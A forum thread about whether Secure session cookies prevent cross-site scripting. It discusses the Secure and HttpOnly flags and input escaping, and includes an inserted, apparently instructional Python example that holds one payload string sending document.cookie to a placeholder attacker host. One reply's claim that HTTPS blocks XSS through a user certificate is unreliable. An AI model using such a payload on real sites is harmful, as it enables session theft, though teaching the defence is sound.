
Preventing XSS

 
Christiaan Thamm
Is ensuring that the session cookie is sent only on HTTPS connections a good approach to protecting websites from cross-site scripting attacks, and why?

My understanding is that the protection mostly revolves around escaping dodgy characters and input validation.

Thanks
 
Tapas Chand
Go through this link

It explains in detail what XSS is and how to mitigate it.
 
Jeanne Boyarsky
Tapas,
Protecting your cookies helps prevent others from intercepting content between when you send the web page to the user and they receive it. It's not for XSS though. It is for preventing a "man in the middle" attack.

You should make your cookie Http Only if possible though. That prevents the bad guys from using XSS to steal the cookie in the first place.
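The two cookie flags discussed above (Secure for transport, HttpOnly for script access) and the escaping step from the original question, as an added example that is not from this thread. It is a small Python model, constructed here, of the two browser rules the posts argue about, plus the output-encoding fix that stops the injected script from running in the first place. The Set-Cookie headers, the cookie values and the attacker host `attacker.example` are all made up for the example.

```python
from http.cookies import SimpleCookie
import html

# Constructed sample: two Set-Cookie header values as a server might emit them.
# JSESSIONID carries both flags; "theme" is an ordinary cookie with neither.
SET_COOKIE_HEADERS = [
    "JSESSIONID=abc123; Path=/; Secure; HttpOnly",
    "theme=dark; Path=/",
]

# Constructed reflected-XSS payload: what an attacker would place in a query
# parameter that the page echoes back. The host is a placeholder.
PAYLOAD = ('<script>new Image().src="https://attacker.example/?c="'
           '+document.cookie</script>')


def parse_cookies(headers):
    """Parse Set-Cookie header values into a dict of name -> Morsel.

    SimpleCookie records the Secure and HttpOnly attributes as True when
    present and as "" when absent.
    """
    jar = {}
    for header in headers:
        cookie = SimpleCookie()
        cookie.load(header)
        for name, morsel in cookie.items():
            jar[name] = morsel
    return jar


def cookies_sent(jar, scheme):
    """Model of the browser's transport rule (the Secure flag).

    A Secure cookie is attached only to https requests; a plain cookie goes
    out on either scheme. This is what protects against a passive observer
    on the wire, not against script running in the page.
    """
    return sorted(name for name, morsel in jar.items()
                  if scheme == "https" or not morsel["secure"])


def cookies_visible_to_script(jar):
    """Model of document.cookie (the HttpOnly flag).

    HttpOnly cookies are never exposed to page script, so an injected
    script cannot read them, whatever scheme they travelled over.
    """
    return sorted(name for name, morsel in jar.items()
                  if not morsel["httponly"])


def render_greeting_unsafe(name):
    """The vulnerable pattern: user input concatenated into HTML unescaped."""
    return "<p>Hello, " + name + "</p>"


def render_greeting(name):
    """The fix the original question points at: HTML-escape output so the
    payload is rendered as text instead of parsed as markup."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


if __name__ == "__main__":
    jar = parse_cookies(SET_COOKIE_HEADERS)
    print("sent over http: ", cookies_sent(jar, "http"))
    print("sent over https:", cookies_sent(jar, "https"))
    print("readable by JS: ", cookies_visible_to_script(jar))
    print("unsafe:", render_greeting_unsafe(PAYLOAD))
    print("safe:  ", render_greeting(PAYLOAD))
```

The point the model makes: Secure changes only what is put on the wire, so a script injected into the page still sees a Secure cookie unless it is also HttpOnly; and neither flag removes the injection itself, which is what the escaping in `render_greeting` addresses.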
 
Henry Freedman
Jeanne Boyarsky wrote:Tapas,
Protecting your cookies helps prevent others from intercepting content between when you send the web page to the user and they receive it. It's not for XSS though. It is for preventing a "man in the middle" attack.

You should make your cookie Http Only if possible though. That prevents the bad guys from using XSS to steal the cookie in the first place.


Please allow me to point out: no matter what one uses to transfer the cookie (HTTP or HTTPS), once a client-side script is invoked that belongs to a third party (attacking site), it transfers all the cookies it wants and uses them to pretend to be a real user, unless they are only valid for one session.

To answer Christiaan's original question: HTTPS is ONE of the factors that helps prevent XSS during a live session, as the attacking site does not have the user certificate to establish another HTTPS session with the server, even if it has stolen the user's cookie. Yet HTTPS is not enough per se; one needs to validate user input with special care so as not to allow a script call to be formulated in the returned response, which can take advantage of those sites the user visits and offer cookies that live longer than a session.
 
Jeanne Boyarsky
Henry Freedman wrote: Once a client-side script is invoked that belongs to a third party (attacking site), it transfers all the cookies it wants and uses them to pretend to be a real user, unless they are only valid for one session.

The point of Http Only is that a client side script can't access it though.
 